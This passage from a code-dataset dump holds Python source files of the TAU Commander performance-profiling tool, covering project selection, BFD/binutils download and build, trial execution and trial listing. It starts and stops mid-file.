{'TAU_PROFILE': '0'}},\n 'trace': {True: {'TAU_TRACE': '1'}, \n False: {'TAU_TRACE': '0'}},\n 'sample': {True: {'TAU_SAMPLING': '1'}, \n False: {'TAU_SAMPLING': '0'}},\n 'callpath': lambda depth: ({'TAU_CALLPATH': '1', 'TAU_CALLPATH_DEPTH': str(depth)} \n if depth > 0 else {'TAU_CALLPATH': '0'})\n }\n tauOpts, tauEnv = _parseConfig(self.config, commandline_options, environment_variables)\n opts.extend(tauOpts)\n env.update(tauEnv)\n\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n \n def showProfile(self, path):\n \"\"\"\n Shows profile data in the specified file or folder\n \"\"\"\n _, env = environment.base()\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n for viewer in 'paraprof', 'pprof':\n if os.path.isfile(path):\n cmd = [viewer, path]\n else:\n cmd = [viewer]\n LOGGER.info(\"Opening %s in %s\" % (path, viewer))\n retval = util.createSubprocess(cmd, cwd=path, env=env, log=False)\n if retval != 0:\n LOGGER.warning(\"%s failed\")\n if retval != 0:\n raise error.ConfigurationError(\"All viewers failed to open '%s'\" % path,\n \"Check that `java` is working, X11 is working,\"\n \" network connectivity, and file permissions\")\n" }, { "alpha_fraction": 0.6281304359436035, "alphanum_fraction": 0.6310425400733948, "avg_line_length": 34.402061462402344, "blob_id": "774d53e63f6fd08764b6afd6c9fb4ad3f9d3a5f4", "content_id": "5b82e9c10fef52c7d76074b912bdf040724d7454", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6868, "license_type": "permissive", "max_line_length": 106, "num_lines": 194, "path": "/packages/tau/commands/project/select.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport tau\nimport logger\nimport error\nimport arguments as args\nfrom model.project import Project\nfrom model.target import Target\nfrom model.application import Application\nfrom model.measurement import Measurement\nfrom model.experiment import Experiment\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Select project components for the next experiment.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s project_name [target] [application] [measurement] [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nPARSER = args.getParserFromModel(Project,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\nPARSER.add_argument('impl_target', \n help=\"Target configuration to select\",\n metavar='[target]',\n nargs='*',\n default=args.SUPPRESS)\nPARSER.add_argument('impl_application', \n help=\"Application configuration to select\",\n metavar='[application]',\n nargs='*',\n default=args.SUPPRESS)\nPARSER.add_argument('impl_measurement', \n help=\"Measurement configuration to select\",\n metavar='[measurements]',\n nargs='*',\n default=args.SUPPRESS) \nPARSER.add_argument('--target',\n help=\"Target configuration to select\",\n metavar='<name>',\n default=args.SUPPRESS)\nPARSER.add_argument('--application', \n help=\"Application configuration to select\",\n metavar='<name>',\n default=args.SUPPRESS)\nPARSER.add_argument('--measurement', \n help=\"Measurement configuration to select\",\n metavar='<name>',\n default=args.SUPPRESS)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef _select(project, attr, given):\n in_project = project[attr]\n if len(given) > 1:\n names = ', '.join([m['name'] for m in list(given)])\n PARSER.error('Multiple %s given (%s). Please specify only one.' % (attr, names))\n elif len(given) == 1:\n selected = list(given)[0]\n if selected.eid not in in_project:\n PARSER.error(\"'%s' is not a member of project '%s'\" % (selected['name'], project['name']))\n return selected.eid\n else:\n if len(in_project) > 1:\n PARSER.error(\"Project '%s' has multiple %s. Please specify which to use.\" % (project['name'], attr))\n elif len(in_project) == 1:\n return in_project[0]\n else:\n PARSER.error(\"Project '%s' has no %s. See `tau project edit --help`.\" % (project['name'], attr))\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n project = Project.withName(args.name)\n if not project:\n PARSER.error(\"There is no project named %r\" % args.name)\n \n given_targets = set()\n given_applications = set()\n given_measurements = set()\n \n for attr, model, dest in [('target', Target, given_targets), \n ('application', Application, given_applications), \n ('measurement', Measurement, given_measurements)]:\n try:\n name = getattr(args, attr)\n except AttributeError:\n pass\n else:\n m = model.withName(name)\n if m:\n dest.add(m)\n else:\n PARSER.error('There is no %s named %s' % (attr, name))\n \n for name in getattr(args, 'impl_'+attr, []):\n t = Target.withName(name)\n a = Application.withName(name)\n m = Measurement.withName(name)\n tam = set([t,a,m]) - set([None])\n if len(tam) > 1:\n PARSER.error(\"'%s' is ambiguous, please use --target, --application,\"\n \" or --measurement to specify configuration type\" % name)\n elif len(tam) == 0:\n PARSER.error(\"'%s' is not a target, application, or measurement\" % name)\n elif t:\n given_targets.add(t)\n elif a:\n given_applications.add(a)\n elif m:\n given_measurements.add(m)\n \n target_eid = _select(project, 'targets', given_targets)\n application_eid = _select(project, 'applications', given_applications)\n measurement_eid = _select(project, 'measurements', given_measurements)\n data = {'project': project.eid,\n 'target': target_eid,\n 'application': application_eid,\n 'measurement': measurement_eid}\n found = Experiment.search(data)\n if not found:\n LOGGER.debug('Creating new experiment')\n found = Experiment.create(data)\n elif len(found) > 1:\n raise error.InternalError('More than one experiment with data %r exists!' % data)\n else:\n LOGGER.debug('Using existing experiment')\n found = found[0]\n\n populated = found.populate()\n LOGGER.info(\"'%s' on '%s' measured by '%s'\" % \n (populated['application']['name'],\n populated['target']['name'],\n populated['measurement']['name']))\n found.select()\n \n return tau.EXIT_SUCCESS\n" }, { "alpha_fraction": 0.6550087332725525, "alphanum_fraction": 0.6571321487426758, "avg_line_length": 34.55555725097656, "blob_id": "7dc40bb0bc3733077ad2f776852ea6ea267a06e8", "content_id": "d60b75b6ba124597ae6a1486a1e1e1bab94431a1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8006, "license_type": "permissive", "max_line_length": 113, "num_lines": 225, "path": "/packages/tau/cf/bfd.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport glob\nimport sys\nimport shutil\nimport platform\n\n# TAU modules\nimport cf\nimport logger\nimport util\nimport error\nimport environment\n\n\nLOGGER = logger.getLogger(__name__)\n\nDEFAULT_SOURCE = {None: 'http://www.cs.uoregon.edu/research/paracomp/tau/tauprofile/dist/binutils-2.23.2.tar.gz'}\n\nLIBS= {None: [ 'libbfd.a' ]}\n\n\nclass Bfd(object):\n \"\"\"\n Encapsulates a BFD installation\n \"\"\"\n def __init__(self, prefix, cxx, src, arch):\n self.src = src\n if src.lower() == 'download':\n try:\n self.src = DEFAULT_SOURCE[arch]\n except KeyError:\n self.src = DEFAULT_SOURCE[None]\n self.prefix = prefix\n self.cxx = cxx\n self.arch = arch\n if os.path.isdir(src):\n self.bfd_prefix = src\n else:\n compiler_prefix = str(cxx.eid) if cxx else 'unknown'\n self.bfd_prefix = os.path.join(prefix, 'bfd', compiler_prefix)\n self.src_prefix = os.path.join(prefix, 'src')\n self.include_path = os.path.join(self.bfd_prefix, 'include')\n self.bin_path = os.path.join(self.bfd_prefix, 'bin')\n self.lib_path = os.path.join(self.bfd_prefix, 'lib')\n\n def verify(self):\n \"\"\"\n Returns true if if there is a working BFD installation at `prefix` with a\n directory named `arch` containing `lib` directories or \n raises a ConfigurationError describing why that installation is broken.\n \"\"\"\n LOGGER.debug(\"Checking BFD installation at '%s' targeting arch '%s'\" % (self.bfd_prefix, self.arch)) \n if not os.path.exists(self.bfd_prefix):\n raise error.ConfigurationError(\"'%s' does not exist\" % self.bfd_prefix)\n # Check for all libraries\n try:\n libraries = LIBS[self.arch]\n LOGGER.debug(\"Checking %s BFD libraries\" % libraries)\n except KeyError:\n libraries = LIBS[None]\n LOGGER.debug(\"Checking default BFD libraries\")\n for lib in libraries:\n path = os.path.join(self.lib_path, lib)\n if not os.path.exists(path):\n raise error.ConfigurationError(\"'%s' is missing\" % path)\n# if not os.access(path, os.X_OK):\n# raise error.ConfigurationError(\"'%s' exists but is not executable\" % path)\n \n LOGGER.debug(\"BFD installation at '%s' is valid\" % self.bfd_prefix)\n return True\n\n def install(self, force_reinstall=False):\n \"\"\"\n TODO: Docs\n \"\"\"\n LOGGER.debug(\"Initializing BFD at '%s' from '%s' with arch=%s\" % \n (self.bfd_prefix, self.src, self.arch))\n \n # Check if the installation is already initialized\n if not force_reinstall:\n try:\n return self.verify()\n except error.ConfigurationError, err:\n LOGGER.debug(err)\n LOGGER.info('Starting BFD installation')\n\n # Download, unpack, or copy BFD source code\n dst = os.path.join(self.src_prefix, os.path.basename(self.src))\n try:\n util.download(self.src, dst)\n srcdir = util.extract(dst, self.src_prefix)\n except IOError as err:\n raise error.ConfigurationError(\"Cannot acquire source file '%s': %s\" % (self.src, err),\n \"Check that the file is accessable\")\n finally:\n try: os.remove(dst)\n except: pass\n\n if not self.cxx:\n compiler_flag = ''\n else:\n family_flags = {'system': '',\n 'GNU': ['-GNU'],\n 'Intel': ['CC=icc','CXX=icpc'] \n }\n# 'PGI': '-pgCC'}\n try:\n compiler_flag = family_flags[self.cxx['family']]\n except KeyError:\n LOGGER.warning(\"BFD has no compiler flag for '%s'. Using defaults.\" % self.cxx['family'])\n\n try:\n # Configure\n prefix_flag = '-prefix=%s' % self.bfd_prefix\n cmd = ['./configure', prefix_flag] + compiler_flag\n LOGGER.info(\"Configuring BFD...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('BFD configure failed')\n\n # Build\n cmd = ['make', '-j4']\n LOGGER.info(\"Compiling BFD...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('BFD compilation failed.')\n\n # Install\n cmd = ['make', 'install']\n LOGGER.info(\"Installing BFD...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('BFD installation failed before verifcation.')\n\n #cp headers from source to install\n\n LOGGER.info(\"Copying headers from BFD source to install 'include'.\")\n for file in glob.glob(os.path.join(srcdir,'bfd','*.h')):\n shutil.copy(file,self.include_path)\n for file in glob.glob(os.path.join(srcdir,'include','*')):\n try: \n shutil.copy(file, self.include_path)\n except: \n dst = os.path.join(self.include_path, os.path.basename(file))\n shutil.copytree(file,dst)\n\n \n #cp additional libraries:\n LOGGER.info(\"Copying missing libraries to install 'lib'.\")\n shutil.copy(os.path.join(srcdir,'libiberty','libiberty.a'),self.lib_path)\n shutil.copy(os.path.join(srcdir,'opcodes','libopcodes.a'),self.lib_path)\n \n\n #fix bfd.h header in the install include location\n LOGGER.info(\"Fixing BFD header in install 'include' location.\")\n with open (os.path.join(self.include_path,'bfd.h'),\"r+\") as myfile:\n data=myfile.read().replace('#if !defined PACKAGE && !defined PACKAGE_VERSION','#if 0') \n myfile.seek(0,0)\n myfile.write(data)\n \n except Exception as err:\n LOGGER.info(\"BFD installation failed, cleaning up %s \" % err)\n shutil.rmtree(self.bfd_prefix, ignore_errors=True)\n finally:\n # Always clean up BFD source\n LOGGER.debug('Deleting %r' % srcdir)\n shutil.rmtree(srcdir, ignore_errors=True)\n \n # Verify the new installation\n try:\n retval = self.verify()\n LOGGER.info('BFD installation complete')\n except Exception as err:\n # Installation failed, clean up any failed install files\n shutil.rmtree(self.bfd_prefix, ignore_errors=True)\n raise error.SoftwarePackageError('BFD installation failed verifciation: %s' % err)\n else:\n return retval\n\n def applyCompiletimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n\n def getRuntimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n pass\n\n \n" }, { "alpha_fraction": 0.6183245182037354, "alphanum_fraction": 0.6200307011604309, "avg_line_length": 29.685863494873047, "blob_id": "774d5db52c323bd86ded6d8a482f1cb017054311", "content_id": "ac005718579dc43ae97e773e62fcefe4edb46ef3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5861, "license_type": "permissive", "max_line_length": 91, "num_lines": 191, "path": "/packages/tau/model/trial.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n# System modules\nimport os\nimport sys\nimport glob\nimport shutil\nfrom datetime import datetime\n\n# TAU modules\nimport logger\nimport util\nimport storage\nimport controller as ctl\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass Trial(ctl.Controller):\n \"\"\"\n Trial data model controller\n \"\"\"\n \n attributes = { \n 'number': {\n 'type': 'integer',\n 'required': True\n },\n 'experiment': {\n 'model': 'Experiment',\n 'required': True\n },\n 'command': {\n 'type': 'string',\n 'required': True\n },\n 'cwd': {\n 'type': 'string',\n 'required': True\n },\n 'environment': {\n 'type': 'string',\n 'required': True\n },\n 'begin_time': {\n 'type': 'datetime'\n },\n 'end_time': {\n 'type': 'datetime'\n },\n 'return_code': {\n 'type': 'integer'\n },\n 'data_size': {\n 'type': 'integer'\n }, \n }\n \n def prefix(self):\n \"\"\"\n Path to trial data\n \"\"\"\n experiment = self.populate('experiment')\n return os.path.join(experiment.prefix(), str(self['number']))\n \n def onCreate(self):\n \"\"\"\n Initialize trial data\n \"\"\"\n prefix = self.prefix()\n try:\n util.mkdirp(prefix)\n except Exception as err:\n raise error.ConfigurationError('Cannot create directory %r: %s' % (prefix, err), \n 'Check that you have `write` access')\n \n def onDelete(self):\n \"\"\"\n Clean up trial data\n \"\"\"\n prefix = self.prefix()\n try:\n shutil.rmtree(prefix)\n except Exception as err:\n if os.path.exists(prefix):\n LOGGER.error(\"Could not remove trial data at '%s': %s\" % (prefix, err))\n \n @classmethod\n def perform(cls, experiment, cmd, cwd, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n def banner(mark, name, time):\n LOGGER.info('{:=<{}}'.format('== %s %s (%s) ==' %\n (mark, name, time), logger.LINE_WIDTH)) \n measurement = experiment.populate('measurement')\n cmd_str = ' '.join(cmd)\n begin_time = str(datetime.utcnow())\n \n trials = experiment.populate('trials')\n trial_number = None\n all_trial_numbers = sorted([trial['number'] for trial in trials])\n LOGGER.debug(\"Trial numbers: %s\" % all_trial_numbers)\n for i, ii in enumerate(all_trial_numbers):\n if i != ii:\n trial_number = i\n break\n if trial_number == None:\n trial_number = len(all_trial_numbers)\n LOGGER.debug(\"New trial number is %d\" % trial_number)\n \n fields = {'number': trial_number,\n 'experiment': experiment.eid,\n 'command': cmd_str,\n 'cwd': cwd,\n 'environment': 'FIXME',\n 'begin_time': begin_time}\n\n banner('BEGIN', experiment.name(), begin_time)\n trial = cls.create(fields)\n prefix = trial.prefix()\n try:\n retval = util.createSubprocess(cmd, cwd=cwd, env=env)\n if retval:\n LOGGER.warning(\"Nonzero return code '%d' from '%s'\" % (retval, cmd_str))\n else:\n LOGGER.info(\"'%s' returned 0\" % cmd_str)\n \n # Copy profile files to trial prefix\n if measurement['profile']:\n profiles = glob.glob(os.path.join(cwd, 'profile.*.*.*'))\n if not profiles:\n LOGGER.error(\"%s did not generate any profile files!\" % cmd_str)\n else:\n LOGGER.info(\"Found %d profile files. Adding to trial...\" % len(profiles))\n for file in profiles:\n shutil.move(file, prefix)\n LOGGER.debug(\"'%s' => '%s'\" % (file, prefix))\n \n # TODO: Handle traces\n \n end_time = str(datetime.utcnow())\n except:\n # Something went wrong so revert the trial\n LOGGER.error(\"Exception raised, reverting trial...\")\n cls.delete(eids=[trial.eid])\n raise\n else:\n # Trial successful, update record and record state for provenance\n data_size = sum(os.path.getsize(os.path.join(prefix, f)) for f in os.listdir(prefix))\n shutil.copy(storage.user_storage.dbfile, prefix)\n cls.update({'end_time': end_time, \n 'return_code': retval,\n 'data_size': data_size}, eids=[trial.eid])\n banner('END', experiment.name(), end_time)\n \n return retval\n" }, { "alpha_fraction": 0.6232876777648926, "alphanum_fraction": 0.6257464289665222, "avg_line_length": 32.48823547363281, "blob_id": "8a195fa057d9eeb5e12253f1a187a8a0af0a2936", "content_id": "58fbf28a6f4eb56684b1813a1912530db357fd06", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5694, "license_type": "permissive", "max_line_length": 105, "num_lines": 170, "path": "/packages/tau/commands/trial/list.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport commands\nimport error\nimport util\nimport arguments as args\nimport environment as env\nfrom model.experiment import Experiment\nfrom model.trial import Trial\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"List experiment trials.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [trial_number] [trial_number] ... [arguments]\n %(command)s -h | --help\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('numbers',), {'help': \"If given, show details for trial with this number\",\n 'metavar': 'trial_number', \n 'nargs': '*',\n 'default': args.SUPPRESS}),\n (('-l','--long'), {'help': \"Display all information about the trial\",\n 'action': 'store_true',\n 'default': False}),\n (('-s','--short'), {'help': \"Summarize trial information\",\n 'action': 'store_true',\n 'default': False})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n selection = Experiment.getSelected()\n if not selection:\n LOGGER.info(\"No experiment configured. See `tau project select`\\n\")\n return tau.EXIT_FAILURE\n \n long = args.long\n short = args.short\n if long and short:\n PARSER.error(\"Please specify either '--long' or '--short', not both\")\n \n try:\n numbers = [int(n) for n in args.numbers]\n except AttributeError:\n found = Trial.search({'experiment': selection.eid})\n except ValueError:\n PARSER.error(\"Invalid trial number\")\n else:\n found = []\n for num in numbers:\n t = Trial.search({'number': num})\n if t:\n found.extend(t)\n else:\n PARSER.error(\"No trial number %d in the current experiment\" % num)\n\n LOGGER.info('{:=<{}}'.format('== %s Trials ==' % selection.name(), logger.LINE_WIDTH) + '\\n')\n if not found:\n LOGGER.info(\"No trials. Use 'tau <command>' or 'tau trial create <command>' to create a new trial\\n\")\n return tau.EXIT_FAILURE\n \n table = Texttable(logger.LINE_WIDTH)\n cols = [('Number', 'c', 'number'),\n ('Data Size', 'c', 'data_size'), \n ('Command', 'l', 'command'), \n ('In Directory', 'l', 'cwd'),\n ('Began at', 'c', 'begin_time'),\n ('Ended at', 'c', 'end_time'),\n ('Return Code', 'c', 'return_code')]\n headers = [header for header, _, _ in cols]\n rows = [headers]\n if long:\n parts = []\n for t in found:\n parts.append(pformat(t.data))\n listing = '\\n'.join(parts)\n elif short:\n parts = []\n trials_by_cmd = {}\n for trial in found:\n trials_by_cmd.setdefault(trial['command'], []).append(trial)\n for key, val in trials_by_cmd.iteritems():\n count = len(val)\n data_size = util.humanReadableSize(sum([trial['data_size'] for trial in val]))\n if count == 1:\n msg = \" 1 trial of '%s' (%s).\" % (os.path.basename(key), data_size)\n else:\n msg = \" %d trials of '%s' (%s).\" % (len(val), os.path.basename(key), data_size)\n parts.append(msg + ' Use `tau trial list` to see details.')\n listing = '\\n'.join(parts) \n else:\n for t in found:\n row = [t.get(attr, '') for _, _, attr in cols if attr]\n row[1] = util.humanReadableSize(row[1])\n rows.append(row)\n table.set_cols_align([align for _, align, _ in cols])\n table.add_rows(rows)\n listing = table.draw()\n \n LOGGER.info('\\n'.join([listing, '']))\n return tau.EXIT_SUCCESS\n\n" }, { "alpha_fraction": 0.6117615699768066, "alphanum_fraction": 0.6127446889877319, "avg_line_length": 33.1128044128418, "blob_id": "9ae8eaddea70a6e7047896f43ef6e02acea8b9a3", "content_id": "997ab88218ada6c0344fb81aa7d3bd76e229583f", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11189, "license_type": "permissive", "max_line_length": 121, "num_lines": 328, "path": "/packages/tau/model/experiment.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport glob\nimport shutil\n\n# TAU modules\nimport logger\nimport settings\nimport error\nimport controller\nimport util\nimport environment\nimport cf.tau\nimport cf.pdt\nimport cf.bfd\nimport cf.libunwind\nfrom model.project import Project\nfrom model.target import Target\nfrom model.compiler import Compiler\nfrom model.trial import Trial\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass Experiment(controller.Controller):\n \"\"\"\n Experiment data model controller\n \"\"\"\n \n attributes = {\n 'project': {\n 'model': 'Project',\n 'required': 